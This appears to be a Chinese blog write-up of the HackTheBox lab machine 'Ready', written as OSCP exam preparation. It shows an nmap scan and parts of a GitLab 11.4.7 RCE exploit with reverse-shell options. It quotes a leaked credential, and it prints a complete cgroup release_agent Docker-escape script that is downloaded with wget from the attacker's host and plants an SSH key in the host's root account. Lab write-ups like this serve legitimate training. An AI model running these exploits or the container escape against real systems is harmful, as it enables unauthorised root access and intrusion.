OSCP备考_0x35_HackThBox靶机_Ready

Ethan医生7个月前靶场229

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.92.20 (扫描TCP)

image.png

http://10.129.92.20:5080/dashboard/projects

image.png

先注册完查看有没有可用的信息

image.png


image.png



parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE')

parser.add_argument('-u', help='GitLab Username/Email', required=True)

parser.add_argument('-p', help='Gitlab Password', required=True)

parser.add_argument('-g', help='Gitlab URL (without port)', required=True)

parser.add_argument('-l', help='reverse shell ip', required=True)

parser.add_argument('-P', help='reverse shell port', required=True)

image.png

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"


这个密码就是当前docker的root密码,切换过去在用户目录得到user.txt:

docker逃逸

参考资料:

就是按照教程,把自己的ssh公钥写进宿主机,然后直接ssh连接:

# docker
wget http://10.10.14.10:7777/miao.sh
chmod +x miao.sh
./miao.sh

# local
ssh root@10.10.10.220



miao.sh
mkdir /tmp/miao && mount -t cgroup -o rdma cgroup /tmp/miao && mkdir /tmp/miao/x
echo 1 > /tmp/miao/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/miao/release_agent

echo '#!/bin/sh' > /cmd
echo "echo 'ssh-rsa ***' > /root/.ssh/authorized_keys" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/miao/x/cgroup.procs"


标签: OSCP

相关文章

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

OSCP备考_0x47_HackThBox靶机_Windows_conceal

OSCP备考_0x47_HackThBox靶机_Windows_conceal

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.122 (扫描TCP)我们普通的tcp啥都没有,所以考虑udp扫描当然也有可能是...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。